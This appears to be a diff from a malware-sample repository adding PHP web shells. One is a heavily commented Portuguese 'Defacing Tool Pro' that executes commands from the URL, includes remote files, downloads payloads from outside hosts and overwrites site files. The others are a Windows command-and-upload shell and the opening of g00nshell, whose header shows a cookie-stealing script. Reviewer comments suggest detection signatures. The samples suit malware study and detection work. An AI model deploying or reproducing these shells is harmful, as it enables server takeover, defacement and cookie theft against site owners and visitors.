A minha intencao inicial sempre foi deixar o script publico, apesar da decisao do meu grupo de deixa-lo priv8.
Mas, deixando-o priv8, ele poderia parar por aqui. Por isso, fiz essa versao comentada do script, e estou tornando-a
publica. Espero que voces desenvolvam cada vez mais o script, melhorem ele e, por favor, deixando o nome dos autores
originais. Peço ainda que vcs me enviem um email (revengans@hotmail.com) com a versao do script que voces fizeram.
Por enquanto, soh tornei publico e comentado o pro17 (a parte principal da cmd). Os scripts complementares eu ainda
vou comenta-los mas, apesar das ferias, ainda estou sem tempo :P. E passo depois os comentarios para ingles...
ps. : eu sei que o filh0te vai ficar puto da vida pq eu estou fzendo isso, mas eu posso :P
pps.: essa versao aqui eh a mesma que era priv8. com excessao de que esta comentada (e muito. acho q exagerei).
ppps: desligue o wordwrap (quebra de linha) do seu editor para visualizar da maneira correta o codigo.
//-> r3v3ng4ns
//-> there's no patch for the stupidity of mankind
-->
<?php
@closelog();//desliga o system logger
@error_reporting(0);//desativa a exibicao de erros. ligue isto aki para qndo for testar o script no seu pc.
// Variaveis que o script usa
$vers="1.7.2 comentado (ex-priv8)";//versao do script
$remote_addr="http://127.0.0.1/~snagnever/defacement/paginanova/";//endereco remoto da pasta aonde estao os scripts
$format_addr=".txt";//extensao dos arquivos dos scripts
$cmd_addr=$remote_addr."pro17".$format_addr;//nome do arquivo do script da cmd (esse aqui, o script principal)
$safe_addr=$remote_addr."safe17".$format_addr;//nome do arquivo do script do dtool em safemode
$writer_addr=$remote_addr."writer17".$format_addr;//nome do arquivo do script que escreve no diretorio
$phpget_addr=$remote_addr."get17".$format_addr;//nome do arquivo do script que faz download de arquivos
$feditor_addr=$remote_addr."feditor".$format_addr;//nome do arquivo do script que edita arquivos online
$put_addr=$remote_addr."feditor_put".$format_addr;//nome do arquivo do script que salva os arquivos editados
$total_addr="http://".$_SERVER['HTTP_HOST'].$_SERVER['PHP_SELF'];//endereco do servidor que esta sendo invadido
$chdir=$_GET['chdir'];//pega a variavel $chdir na url do navegador (?chdir=...)
if($chdir=="")$chdir=getcwd();//se a variavel $chdir for vazia, ele a determina como o diretorio atual
//pega as variaveis usadas no script da url do navegador (www.com.br/index.php?fu=1&list=1&cmd=id)
$fu=$_GET['fu'];//para definir qual metodo (funcao) sera usada para enviar o comando pelo script para o sistema
$list=$_GET['list'];//para listar as cartas em modo texto com links clicaveis
$cmd=$_GET['cmd'];//o comando que serah enviado para o sistema
$cmd=stripslashes($cmd);//tira backslashs a mais do cmd
$ch_msg="";//define a msg de erro do 'chdir' como vazia
//pega informacoes do usuario atual (normalmente apache ou nobody)
$login=@posix_getuid();
$euid=@posix_geteuid();
$gid=@posix_getgid();
// Comando CHDIR do dtool. serah comentado parte a parte
//reconhece se ha a string 'chdir' na variavel $cmd e verifica se a posicao dessa string eh 0,
//ou seja, a primeira da linha. todos os !==false poderiam ser tirados, mas assim facilita o
//entendimento
if (strpos($cmd, 'chdir')!==false and strpos($cmd, 'chdir')=='0'){
//se sim, explode a variavel $cmd, separando-a por ' '(espacos em branco) num array $boom
//sendo assim, boom['0'] eh a string 'chdir', e boom['1'] eh o diretorio no qual o usuario
//deseja entrar e o restante dos comandos (separados por ';')
$boom = explode(" ",$cmd,2);
//explode o $boom['1'] separando a string por ';', para separar o diretorio no qual o usuario
//deseja ir e o restantes dos comandos, na array $boom2. sendo assim, $boom2['0'] eh o diretorio
//que o usuario deseja ir e $boom2['1'] eh o restante dos comandos.
$boom2 = explode(";",$boom['1'], 2);
$diretorio = $boom2['0'];//aqui define $diretorio como $boom2['0']
if($boom['1']=="/")$chdir="";//se o usuario desejar ir ao diretorio root ('/'), a variavel $chdir aqui
//eh definida como '' pois, mais para frente, ele recebera o valor '/'.
//mas se o comando dado pelo usuario contiver 'chdir ..', isso quer dizer que o usuario deseja subir
//um nivel.
else if(strpos($cmd, 'chdir ..')!==false){
//aqui ele primeio explode o $chdir (que agora eh o diretorio atual em que o usuario esta) por '/' e
//depois inverte a ordem das arrays, sendo que, agora, o $cadaDir['0'] eh o ultimo diretorio em que
//o usuario esta (ou seja, se $chdir fosse '/etc/httpd/conf/php' o $cadaDir['0'] seria 'php'
$cadaDir = array_reverse(explode("/",$chdir));
//se o ultimo diretorio for vazio, isso quer dizer q $chdir estava no formato '/etc/httpd/conf/php/' ou seja,
//tinha uma '/' no final. sendo assim, o $lastDir serah a $cadaDir['1']. e adiciona-se uma '/' a variavel.
if($cadaDir['0']=="" or $cadaDir['0'] ==" ") $lastDir = $cadaDir['1']."/";
//se nao for vazio, o $lastDir vai ser o $cadaDir['0'] mesmo, e adiciona-se uma '/' a variavel $lastDir,
//que, seguindo o exemplo de $chdir='/etc/httpd/conf/php', entao $lastDir seria ='php/.
//alem disso tudo acima, o $chdir agora recebe uma '/' como ultima caractere
else{ $lastDir = $cadaDir['0']."/"; $chdir = $chdir."/";}
//agora, da string $diretorio remove-se $lastDir. ou seja:
//sendo $diretorio='/etc/httpd/conf/php/'
//e $lastDir='php/'
//remove-se 'php/' de '/etc/httpd/conf/php/', tornando $diretorio='/etc/httpd/conf/'
$diretorio = str_replace($lastDir,"",$chdir);
//com a possibilidade de um imprevisto ocorrer aih em cima, novamente se o usuario quiser ir ao diretorio
//root ('/'), o $diretorio eh definido como '', (vazio)
if($diretorio=="/")$chdir="";
}
//se houver uma '/' como ultima caractere da string $diretorio, remove-se ela.
if(strrpos($diretorio,"/")==(strlen($diretorio)-1)) $diretorio=substr($diretorio,0,strrpos($diretorio,"/"));
//se for possivel abrir o diretorio, define o $chdir como = $diretorio, para usa-lo mais lah em baixo,
//no envio do comando para o sistema e para mante-lo na url
if(@opendir($chdir."/".$diretorio)!==false) $chdir=$chdir."/".$diretorio;
else if(@opendir($diretorio)!==false) $chdir=$diretorio;
//se nao for possivel entra no dir, define a msg de erro.
else $ch_msg="dtool: line 1: chdir: $diretorio: No such directory or permission denied.\n";
if($boom2['1']==null) $cmd = $boom['2']; else $cmd = $boom2['1'].$boom2['2'];
}
//define o comando que serah mostrado para o usario o que o comando eh ateh aki
//mais para baixo, o comando que efetivamente serah enviado para o sistema serah modificado
$cmdshow=$cmd;
//se as variaveis estiverem definidas, aqui sao definidas os $show* para mante-los na url em cada envio
//de comando do usuario.
if($chdir==getcwd() or empty($chdir) or $chdir=="")$showdir="";else $showdir="+'chdir=$chdir&'";
if($fu=="" or $fu=="0" or empty($fu))$showfu="";else $showfu="+'fu=$fu&'";//se $fu for definida, mantem ele na url
if($list=="" or $list=="0" or empty($list)){$showfl="";$fl="on";}else{$showfl="+'list=1&'"; $fl="off";}
//procura alguns arquivos que mais tarde podem ser uteis ao usuario
if (@is_dir("/usr/X11R6/")) $pro0="<i>X11</i> at /usr/X11R6/, ";//procura a pasta do x11
if (@file_exists("/usr/X11R6/bin/xterm")) $pro1="<i>xterm</i> at /usr/X11R6/bin/xterm, ";//procura o xterm
if (@file_exists("/usr/bin/nc")) $pro2="<i>nc</i> at /usr/bin/nc, ";//procura o netcat
if (@file_exists("/usr/bin/wget")) $pro3="<i>wget</i> at /usr/bin/wget, ";//procura o wget
if (@file_exists("/usr/bin/lynx")) $pro4="<i>lynx</i> at /usr/bin/lynx, ";//procura o lynx
if (@file_exists("/usr/bin/gcc")) $pro5="<i>gcc</i> at /usr/bin/gcc, ";//procura o gcc
if (@file_exists("/usr/bin/cc")) $pro6="<i>cc</i> at /usr/bin/cc ";//procura o cc
$pro=$pro0.$pro1.$pro2.$pro3.$pro4.$pro5.$pro6;//junta tudo numa variavel
$ip=@gethostbyname($_SERVER['HTTP_HOST']);//mostra o ip do usuario
//arqui, se a $cmd tiver o comando 'ls', adiciona-se o parametro '-F' aa 'ls', deixando
//'ls -F', mas procura-se manter os outros parametros que o usuario deixou para o ls.
//par isso definiu o $cmdshow lah em cima, isso aqui o usuario nao sabe. o parametro
//'-F' no ls facilita a visualizacao dos arquivos.
if(strpos($cmd, 'ls --') !==false){ $cmd = str_replace('ls --', 'ls -F --', $cmd);}
else if(strpos($cmd, 'ls -') !==false){ $cmd = str_replace('ls -', 'ls -F', $cmd);}
else if(strpos($cmd, ';ls') !==false){ $cmd = str_replace(';ls', ';ls -F', $cmd);}
else if(strpos($cmd, '; ls') !==false){ $cmd = str_replace('; ls', ';ls -F', $cmd);}
else if($cmd=='ls'){$cmd = "ls -F";}
//se houverem '//' no $chdir, aki sao removidas
if(strpos($chdir, '//') !==false) $chdir = str_replace('//', '/', $chdir);
?>
<body onload="window.document.c.comando.focus();window.document.c.comando.select();">
<style>.campo{font-family: Verdana; color:white;font-size:11px;background-color:#414978;height:23px}
.infop{font-family: verdana; font-size: 10px; color:#000000;}
.infod{font-family: verdana; font-size: 10px; color:#414978;}
.algod{font-family: verdana; font-size: 12px; font-weight: bold; color: #414978;}
.titulod{font:Verdana; color:#414978; font-size:20px;}</style>
<script>
//aqui sao as funcoes do javascript, que sao chamadas ao enviar o form, ou ao clicar num botao das ferramentas do dtool
//Variavel de Include
//essa funcao descobre a variavel que eh usada na pagina vulneravel para injetar o codigo
//malicioso. eh aquela variavel que vem depois do '?' e antes do '='. tipo:
//www.com.br/index.php?site= ----> aqui no caso, a inclvar eh 'site'
function inclVar(){
var addr = location.href.substring(0,location.href.indexOf('?')+1);
var stri = location.href.substring(addr.length,location.href.length+1);
inclvar = stri.substring(0,stri.indexOf('='));
}
//essa funcao envia o comando para o sistema, colocando-o na url do navegador.
//a funcao enviaCMD() estah colocada no evento onSubmit do form, o que quer dizer que antes
//da form ser enviada, ele executara a funcao. se a funcao retornar true, a form eh enviada. caso
//contrario, a form nao eh enviada. mas nao keremos que a form seja enviada, keremos simplismente
//que seja definido o cmd que o usuario escolheu na url do browser. por isso, essa funcao sempre retorna
//false
function enviaCMD(){
inclVar();//chama a funcao para definir a variavel de include
window.document.location.href='<?=$total_addr;?>'+'?'+inclvar+'='+'<?=$cmd_addr;?>'+'?&'<?=$showdir.$showfu.$showfl;?>+'cmd='+window.document.c.comando.value;
return false;//isso aqui evita que o form seja enviado.
}
//essa funcao eh para alterar o metodo (a funcao do php) que serah usado para enviar o cmd para o sistema
//ela estah colocada no evento OnSelect do pulldown de metodos ('using ...') do dtool.
//esta aqui o grande diferencial do dtool. ele utiliza pode utilizar varias funcoes do php para enviar o comando
//para o sistema, enquanto a grande maioria das cmds (todas que eu jah vi) utilizam apenas 3: passthru(), system() e
//exec(), e ainda assim, nao trabalham de forma correta com o exec().
//Na maior parte das vezes, o servidor nao esta realmente em Safemode, pois (para admins amadores :P) isso causaria
//mto problema de compatibilidade nos scripts dos clientes que hospedam a pagina. Por isso, esses admins teem o costume
//de simplismente desativar o passthru, o system e o exec, "tornando o servidor muito mais seguro".
function ativaFe(qual){
inclVar();//chama a funcao para definir a variavel de include
window.document.location.href='<?=$total_addr;?>'+'?'+inclvar+'='+'<?=$cmd_addr;?>'+'?&'<?=$showdir.$showfl;?>+'fu='+qual+'&cmd='+window.document.c.comando.value;
return false;//isso aqui evita que o form seja enviado.
}
//PHPget
//funcao que abre prompts perguntando para o usuario informacoes que o phpget precisa para fazer o
//download do arquivo.
function PHPget(){
inclVar();//chama a funcao para definir a variavel de include
var c=prompt("[ PHPget ] by r3v3ng4ns\nDigite a ORIGEM do arquivo (url) com ate 7Mb\n-Utilize caminho completo\n-Se for remoto, use http:// ou ftp://:","http://www.colegioparthenon.com.br/dirativo/bd/nc.gif");
var dir = c.substring(0,c.lastIndexOf('/')+1);//descobre qual eh o diretorio
var file = c.substring(dir.length,c.length+1);//descobre o nome do arquivo.
var p=prompt("[ PHPget ] by r3v3ng4ns\nDigite o DESTINO do arquivo\n-Utilize caminho completo\n-O diretorio de destino deve ser writable","<?=$chdir;?>/"+file);
window.open('<?=$total_addr;?>'+'?'+inclvar+'='+'<?=$phpget_addr;?>'+'?&'+'inclvar='+inclvar+'&'<?=$showdir;?>+'c='+c+'&p='+p);
}
//PHPwriter
//funcao que abre prompts perguntando para o usuario informacoes que o phpwriter precisa para escrever
//a index no servidor.
function PHPwriter(){
inclVar();//chama a funcao para definir a variavel de include
var url=prompt("[ PHPwriter ] by r3v3ng4ns\nDigite a URL do frame","http://www.geocities.com/revensite/index.htm");
var dir = url.substring(0,url.lastIndexOf('/')+1);//descobre qual eh o diretorio
var file = url.substring(dir.length,url.length+1);//descobre o nome do arquivo.
var f=prompt("[ PHPwriter ] by r3v3ng4ns\nDigite o Nome do arquivo a ser criado\n-Utilize caminho completo\n-O diretorio de destino deve ser writable","<?=$chdir;?>/"+file);
t=prompt("[ PHPwriter ] by r3v3ng4ns\nDigite o Title da pagina","[ r00ted team ] owned you :P");
window.open('<?=$total_addr;?>'+'?'+inclvar+'='+'<?=$writer_addr;?>'+'?&'+'inclvar='+inclvar+'&'<?=$showdir;?>+'url='+url+'&f='+f+'&t='+t);
}
//Resumo
//funcao que abre uma janela contendo informacoes importantes para o usuario
//guardar num arquivo, possivelmente, nas proximas versoes, essa funcao deixara de existir.
function resumir() {
inclVar();//chama a funcao para definir a variavel de include
resumo='<DIV STYLE="font-family: verdana; font-size: 11px;"><b> <?=$total_addr;?>?'+inclvar+'=<?=$cmd_addr;?></b><br><?php
$uname = posix_uname();
while (list($info, $value) = each ($uname)) { ?><b><?= $info ?>:</b> <?= $value ?><br><?php } ?><b>default user:</b> uid(<?= $login ?>) euid(<?= $euid ?>) gid(<?= $gid ?>)<br><b>ip: </b> <?=$ip;?><br><b>server info: </b><?="$SERVER_SOFTWARE $SERVER_VERSION";?><br><b>pro info: </b><?=$pro;?><br><b>path da pagina: </b><?= getcwd() ?><br><b>path writable:</b><? if(@is_writable(getcwd())){ echo " <b>YES</b>"; }else{ echo " no"; } ?>'
jan=open("","jan","width=580,height=300,menubar=yes,scrollbars=yes,resizable=yes,");
jan.document.write(resumo);jan.document.write("<p> <? echo str_repeat("==", 35)?></p>");
jan.document.title="Resumo do servidor";jan.focus();
}
//PHPfilEditor
//funcao que abre um prompt perguntando para o usuario o nome do arquivo que serah aberto
//com o phpfileditor
function PHPf(){
inclVar();//chama a funcao para definir a variavel de include
var o=prompt("[ PHPfilEditor ] by r3v3ng4ns\nDigite o nome do arquivo que deseja abrir\n-Utilize caminho completo\n-Abrir arquivos remotos, use http:// ou ftp://","<?=$chdir;?>/index.php");
var dir = o.substring(0,o.lastIndexOf('/')+1);//descobre kual eh o diretorio
var file = o.substring(dir.length,o.length+1);//descobre o nome do arquivo.
window.open('<?=$total_addr;?>?'+inclvar+'=<?=$feditor_addr;?>?&inclvar='+inclvar+'&o='+o);
}
//SafeMode
//abre o dtool no modo em safemode
function safeMode(){
inclVar();//chama a funcao para definir a variavel de include
if (confirm ('Deseja ativar o DTool com suporte a SafeMode?')){
window.document.location.href='<?=$total_addr;?>'+'?'+inclvar+'='+'<?=$safe_addr;?>'+'&'<?=$showdir;?>;
}else{ return false }
}
//FileListing
//lista os arquivos em modo texto, com links clicaveis para acesso de diretorio e edicao de arquivos
function list(turn){
inclVar();//chama a funcao para definir a variavel de include
if(turn=="off")turn=0;
else if(turn=="on")turn=1;
window.document.location.href='<?=$total_addr;?>'+'?'+inclvar+'='+'<?=$cmd_addr;?>'+'?&'<?=$showdir.$showfu;?>+'list='+turn+'&cmd='+window.document.c.comando.value;
return false;
}
//Overwrite Files
//ativa o script para substituir arquivos com uma dada palavra chave.
function overwrite(){
inclVar();//chama a funcao para definir a variavel de include
if(confirm("O script tentara substituir todos os arquivos (do diretorio atual) que\nteem no nome a palavra chave especificada. Os arquivos serao\nsubstituidos pelo novo arquivo, especificado por voce.\n\nLembre-se!\n-Se for para substituir arquivos com a extensao jpg, utilize\ncomo palavra chave .jpg (inclusive o ponto!)\n-Utilize caminho completo para o novo arquivo, e se for remoto,\nutilize http:// e ftp://")){
keyw=prompt("Digite a palavra chave",".jpg");
newf=prompt("Digite a origem do arquivo que substituira","http://www.colegioparthenon.com.br/ingles/bins/revenmail.jpg");
if(confirm("Se ocorrer um erro e o arquivo nao puder ser substituido, deseja\nque o script apague os arquivos e crie-os novamente com o novo conteudo?\nLembre-se de que para criar novos arquivos, o diretorio deve ser writable.")){
trydel=1
}else{trydel=0}
if(confirm("Deseja substituir todos os arquivos do diretorio\n<?=$chdir;?> que contenham a palavra\n"+keyw+" no nome pelo novo arquivo de origem\n"+newf+" ?\nIsso pode levar um tempo, dependendo da quantidade de\narquivos e do tamanho do arquivo de origem.")){
window.location.href='<?=$total_addr;?>?'+inclvar+'=<?=$cmd_addr;?>?&chdir=<?=$chdir;?>&list=1&'<?=$showfu?>+'&keyw='+keyw+'&newf='+newf+'&trydel='+trydel;return false;
}
}
}
</script>
<table width="690" border="0" align="center" cellpadding="2" cellspacing="0" bgcolor="#FFFFFF">
<tr><td><div align="center" class="titulod"><b>[ Defacing Tool Pro v<?=$vers;?> ] <a href="javascript:window.open('<?=$remote_addr;?>help.txt');">?</a><br>
<font size=2>by r3v3ng4ns - revengans@hotmail.com </font>
</b></div></td></tr>
<tr><td><TABLE width="370" BORDER="0" align="center" CELLPADDING="0" CELLSPACING="0">
<?php
$uname = @posix_uname();
while (list($info, $value) = each ($uname)) { ?>
<TR><TD><DIV class="infop"><b><?=$info ?>:</b> <?=$value;?></DIV></TD></TR><?php } ?>
<TR><TD><DIV class="infop"><b>user:</b> uid(<?=$login;?>) euid(<?=$euid;?>) gid(<?=$gid;?>)</DIV></TD></TR>
<TR><TD><DIV class="infod"><b>write permission:</b><? if(@is_writable($chdir)){ echo " <b>YES</b>"; }else{ echo " no"; } ?></DIV></TD></TR>
<TR><TD><DIV class="infop"><b>server info: </b><?="$SERVER_SOFTWARE $SERVER_VERSION";?></DIV></TD></TR>
<TR><TD><DIV class="infop"><b>pro info: ip </b><?="$ip, $pro";?></DIV></TD></TR>
<? if($chdir!=getcwd()){?>
<TR><TD><DIV class="infop"><b>original path: </b><?=getcwd() ?></DIV></TD></TR><? } ?>
<TR><TD><DIV class="infod"><b>current path: </b><?=$chdir ?>
</DIV></TD></TR></TABLE></td></tr>
<tr><td><form name="c" id="c" method="post" action="#" onSubmit="return enviaCMD()">
<table width="375" border="1" align="center" cellpadding="0" cellspacing="0" bordercolor="#414978"><tr><td><table width="370" border="0" align="center" cellpadding="1" cellspacing="1" bgcolor="white"><tr>
<td width="75"><DIV class="algod">command</DIV></td>
<td width="300"><input name="comando" type="text" id="comando" value='<?=$cmdshow;?>' style="width:295; font-size:12px" class="campo">
</td></tr></table><table><tr><td>
<?php
if(isset($chdir)) @chdir($chdir);//aqui muda o diretorio que o script trabalha para o definido em $chdir
ob_start();
//As funcoes abaixo trabalham de forma correta com o output das funcoes de php usadas,
//o que normalmente as cmds nao fazem...
function safemode($what){//como ultimo recurso, mostra que o srv estah em safemode
//'outputeia' uma msg de erro, supondo q o srv esteja em safemode
echo "It seems that this server is using php in safemode. Try to use DTool in Safemode.";
}
function popenn($what){//envia o cmd para o sistema usando popen()
$handle=popen("$what", "r");//o popen funciona semelhante ao fopen
$out=@fread($handle, 2096);//coloca numa variavel o retorno
echo $out;//'outputeia' o retorno
@pclose($handle);
}
function execc($what){//envia o cmd para o sistema usando exec()
exec("$what",$array_out);//o exec() recebe o retorno em arrays.
$out=@implode("\n",$array_out);//aqui junta as arrays
echo $out;//aqui 'outputeia' o retorno
}
function shell($what){//envia o cmd para o sistema usado shell_exec() (tb conhecido como `backtik operator`)
echo(shell_exec($what));//'outputeia' o retorno
}
$funE="function_exists";//para encurtar o nome abaixo... :P
//testa quais funcoes existem, para detectar automaticamente qual metodo
//sera usado para enviar a funcao para o sistema
if($funE('passthru')){$fe="passthru";$feshow=$fe;}
elseif($funE('system')){$fe="system";$feshow=$fe;}
elseif($funE('exec')){$fe="execc";$feshow="exec";}
elseif($funE('popen')){$fe="popenn";$feshow="popen";}
elseif($funE('shell_exec')){$fe="shell";$feshow="shell_exec";}
else {$fe="safemode";$feshow=$fe;}
//se o usuario tiver definido qual metodo serah usado para enviar o cmd
//para o sistema, aki ele eh reconhecido/definido.
if($fu!="" or !empty($fu)){
if($fu==1){$fe="passthru";$feshow=$fe;}
if($fu==2){$fe="system";$feshow=$fe;}
if($fu==3){$fe="execc";$feshow="exec";}
if($fu==4){$fe="popenn";$feshow="popen";}
if($fu==5){$fe="shell";$feshow="shell_exec";}
}
//executa o comando usando o metodo escolhido pelo usuario, e
//faz com que a saida de erro apareca na tela ( com o '2>&1')
$fe("$cmd 2>&1");
$output=ob_get_contents();ob_end_clean();
?>
<td><input type="button" name="snd" value="send cmd" class="campo" style="background-color:#313654" onClick="enviaCMD()"><select name="qualf" class="campo" style="background-color:#313654" onchange="ativaFe(c.qualf.value);">
<option><?="using $feshow()";?>
<option value="1">use passthru()
<option value="2">use system()
<option value="3">use exec()
<option value="4">use popen()
<option value="5">use shell_exec()
<option value="0">auto detect (default)
</select><input type="button" name="getBtn" value="PHPget" class="campo" onClick="PHPget()"><input type="button" name="writerBtn" value="PHPwriter" class="campo" onClick="PHPwriter()"><br><input type="button" name="edBtn" value="fileditor" class="campo" onClick="PHPf()"><input type="button" name="resBtn" value="resumo" class="campo" onClick="resumir()"><input type="button" name="listBtn" value="list files <?=$fl;?>" class="campo" onClick="list('<?=$fl;?>')"><input type="button" name="sbstBtn" value="overwrite files" class="campo" onClick="overwrite()"><input type="button" name="smBtn" value="safemode" class="campo" onClick="safeMode()">
</tr></table></td></tr></table></form></td></tr>
<tr><td align="center"><DIV class="algod"><br>stdOut from <?="\"<i>$cmdshow</i>\", using <i>$feshow()</i>";?></i></DIV>
<TEXTAREA name="output_text" COLS="90" ROWS="10" STYLE="font-family:Courier; font-size: 12px; color:#FFFFFF; font-size:11 px; background-color:black;width:683;">
<?php
echo $ch_msg;
if (empty($cmd) and $ch_msg=="") echo ("Comandos Exclusivos do DTool Pro\n\nchdir &lt;diretorio&gt;; outros; cmds;\nMuda o diretorio para aquele especificado e permanece nele. Eh como se fosse o 'cd' numa shell, mas precisa ser o primeiro da linha. ex: chdir /diretorio/sub/;pwd;ls\n\nPHPget, PHPwriter, Fileditor, File List e Resumo\nfale com o r3v3ng4ns :P");
if (!empty($output)) echo str_replace(">", "&gt;", str_replace("<", "&lt;", $output));
?></TEXTAREA><BR></td></tr>
<?php
if($list=="1") include($remote_addr."flist.txt");
?>
</table>
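Review bot: The comments in this file are all in Portuguese and none of them marks the two lines a defender most needs to find, so I would annotate those in English. Above `$fe("$cmd 2>&1");`, in the block that defines popenn/execc/shell, add `// $cmd comes unfiltered from $_GET['cmd']; $fe is whichever of passthru/system/exec/popen/shell_exec function_exists() found, or the one picked by fu`. That comment also makes clear that a `disable_functions` list covering only the first three leaves the popen and shell_exec wrappers reachable. Above `include($remote_addr."flist.txt")`, add `// remote include over http:// - only works where URL includes are enabled (allow_url_include)`. The opening `@closelog(); @error_reporting(0);` pair, combined with a request parameter reaching a variable-function call, looks like a usable static signature for this family, though that is inferred from this one sample.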

103
PHP/Backdoor.PHP.WebShell.u Normal file

@ -0,0 +1,103 @@
<html><head><title>-:[GreenwooD]:- WinX Shell</title></head>
<body bgcolor="#FFFFFF" text="#000000" link="#0066FF" vlink="#0066FF" alink="#0066FF">
<?php
// -----:[ Start infomation ]:-----
// It's simple shell for all Win OS.
// Created by greenwood from n57
//
// ------:[ End infomation]:-------
set_magic_quotes_runtime(0);
//*Variables*
//-------------------------------
$veros = `ver`;
$host = gethostbyaddr($_SERVER['REMOTE_ADDR']);
$windir = `echo %windir%`;
//------------------------------
if( $cmd == "" ) {
$cmd = 'dir /OG /X';
}
//-------------------------------
//------------------------------
print "<table style=\"font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 9px; border: 1px #000000 dotted\" border=\"0\" cellspacing=\"1\" cellpadding=\"2\" >";
print "<tr>";
print "<td><font color=\"#990000\">You:</font></td>" ;
print "<td> ".$_SERVER['REMOTE_ADDR']." [<font color=\"#0033CC\">".$host."</font>] </td>" ;
print "</tr>";
print "<tr>";
print "<td><font color=\"red\">Version OS:</font></td>" ;
print "<td><font color=\"#0066CC\"> $veros </font></td>";
print "</tr>";
print "<tr>";
print "<td><font color=\"#990000\">Server:</font></td>";
print "<td><font color=\"#0066CC\">".$_SERVER['SERVER_SIGNATURE']."</font></td>";
print "</tr>";
print "<tr>";
print "<td><font color=\"#990000\">Win Dir:</font></td>";
print "<td><font color=\"#0066CC\"> $windir </font></td>";
print "</tr>";
print "</table>";
print "<br>";
//------- [netstat -an] and [ipconfig] and [tasklist] ------------
print "<form name=\"cmd_send\" method=\"post\" action=\"$PHP_SELF\">";
print "<input style=\"font-family: Verdana; font-size: 12px; width:10%;border: #000000; border-style: dotted; border-top-width: 1px; border-right-width: 1px; border-bottom-width: 1px; border-left-width: 1px\" type=\"submit\" name=\"cmd\" value=\"netstat -an\">";
print "&nbsp;&nbsp;&nbsp;";
print "<input style=\"font-family: Verdana; font-size: 12px; width:10%;border: #000000; border-style: dotted; border-top-width: 1px; border-right-width: 1px; border-bottom-width: 1px; border-left-width: 1px\" type=\"submit\" name=\"cmd\" value=\"ipconfig\">";
print "&nbsp;&nbsp;&nbsp;";
print "<input style=\"font-family: Verdana; font-size: 12px; width:10%;border: #000000; border-style: dotted; border-top-width: 1px; border-right-width: 1px; border-bottom-width: 1px; border-left-width: 1px\" type=\"submit\" name=\"cmd\" value=\"tasklist\">";
print "</form>";
//-------------------------------
//-------------------------------
print "<textarea style=\"width:100%; height:50% ;border: #000000; border-style: dotted; border-top-width: 1px; border-right-width: 1px; border-bottom-width: 1px; border-left-width: 1px\" readonly>";
system($cmd);
print "</textarea>";
print "<br>";
//-------------------------------
print "<form name=\"cmd_send\" method=\"post\" action=\"$PHP_SELF\">";
print "<font face=\"Verdana\" size=\"1\" color=\"#990000\">CMD: </font>";
print "<br>";
print "<input style=\"font-family: Verdana; font-size: 12px; width:50%;border: #000000; border-style: dotted; border-top-width: 1px; border-right-width: 1px; border-bottom-width: 1px; border-left-width: 1px\" type=\"text\" name=\"cmd\" value=\"$cmd\">";
print " <input style = \"font-family: Verdana; font-size: 12px; background-color: #FFFFFF; border: #666666; border-style: solid; border-top-width: 1px; border-right-width: 1px; border-bottom-width: 1px; border-left-width: 1px\" type=\"submit\" name=\"_run\" value=\"Run\">";
print "</form>";
//-------------------------------
print "<form enctype=\"multipart/form-data\" action=\"$PHP_SELF\" method=\"post\">";
print "<font face=\"Verdana\" size=\"1\" color=\"#990000\">Upload:</font>";
print "<br>";
print "<input type=\"hidden\" name=\"MAX_FILE_SIZE\" value=\"100000\">";
print "<font face=\"Verdana\" size=\"1\" color=\"#990000\">File: </font><input style=\"font-family: Verdana; font-size: 9px; background-color: #FFFFFF; border: #000000; border-style: dotted; border-top-width: 1px; border-right-width: 1px; border-bottom-width: 1px; border-left-width: 1px\" name=\"userfile\" type=\"file\">";
print " <font face=\"Verdana\" size=\"1\" color=\"#990000\">Filename on server: </font> <input style=\"font-family: Verdana; font-size: 9px;background-color: #FFFFFF; border: #000000; border-style: dotted; border-top-width: 1px; border-right-width: 1px; border-bottom-width: 1px; border-left-width: 1px\" name=\"serverfile\" type=\"text\">";
print" <input style =\"font-family: Verdana; font-size: 9px; background-color: #FFFFFF; border: #666666; border-style: solid; border-top-width: 1px; border-right-width: 1px; border-bottom-width: 1px; border-left-width: 1px\" type=\"submit\" value=\"Send\">";
print"</form>";
?>
<?
// Script for uploading
if (is_uploaded_file($userfile)) {
move_uploaded_file($userfile, $serverfile);
}
?>
<center><font face="Verdana" size="1" color="#000000">Created by -:[GreenwooD]:- </font></center>
</body></html>
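Review bot: This sample is added with no analyst-facing description, and the fact a triager most needs is visible in the code: it reads `$cmd`, `$userfile`, `$serverfile` and `$PHP_SELF` as bare globals and calls `set_magic_quotes_runtime(0)` near the top, so it appears to be written for a legacy PHP with register_globals enabled (that function was removed in PHP 7.0). I would record this in a sidecar note or repository index rather than in the file itself, so the sample's bytes and hash stay unchanged, for example `Backdoor.PHP.WebShell.u: Windows command/upload web shell; depends on register_globals and set_magic_quotes_runtime()`. For detection content, the stable strings are the page title on the first line, the `system($cmd)` call fed by a form field named `cmd`, and `move_uploaded_file($userfile, $serverfile)`, where the destination name comes from the request.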

730
PHP/Backdoor.PHP.WebShell.w Normal file

@ -0,0 +1,730 @@
<?php
/*
######################################################################
# [g00n]FiSh presents: #
# g00nshell v1.3 final #
############################DOCUMENTATION#############################
#To execute commands, simply include ?cmd=___ in the url. #
#Ex: http://site.com/shl.php?cmd=whoami #
# #
#To steal cookies, use ?cookie=___ in the url. #
#Ex: <script>document.location.href= #
#'http://site.com/shl.php?cookie='+document.cookies</script> #
##########################VERIFICATION LEVELS#########################
#0: No protection; anyone can access #
#1: User-Agent required #
#2: Require IP #
#3: Basic Authentication #
##############################KNOWN BUGS##############################
#Windows directory handling #
# #
#The SQL tool is NOT complete. There is currently no editing function#
#available. Some time in the future this may be fixed, but for now #
#don't complain to me about it #
################################SHOUTS################################
#pr0be - Beta testing & CSS #
#TrinTiTTY - Beta testing #
#clorox - Beta testing #
#Everyone else at g00ns.net #
########################NOTE TO ADMINISTRATORS########################
#If this script has been found on your server without your approval, #
#it would probably be wise to delete it and check your logs. #
######################################################################
*/
// Configuration
$auth = 0;
$uakey = "b5c3d0b28619de70bf5588505f4061f2"; // MD5 encoded user-agent
$IP = array("127.0.0.2","127.0.0.1"); // IP Addresses allowed to access shell
$email = ""; // E-mail address where cookies will be sent
$user = "af1035a85447f5aa9d21570d884b723a"; // MD5 encoded User
$pass = "47e331d2b8d07465515c50cb0fad1e5a"; // MD5 encoded Password
// Global Variables
$version = "1.3 final";
$self = $_SERVER['PHP_SELF'];
$soft = $_SERVER["SERVER_SOFTWARE"];
$servinf = split("[:]", getenv('HTTP_HOST'));
$servip = $servinf[0];
$servport = $servinf[1];
$uname = php_uname();
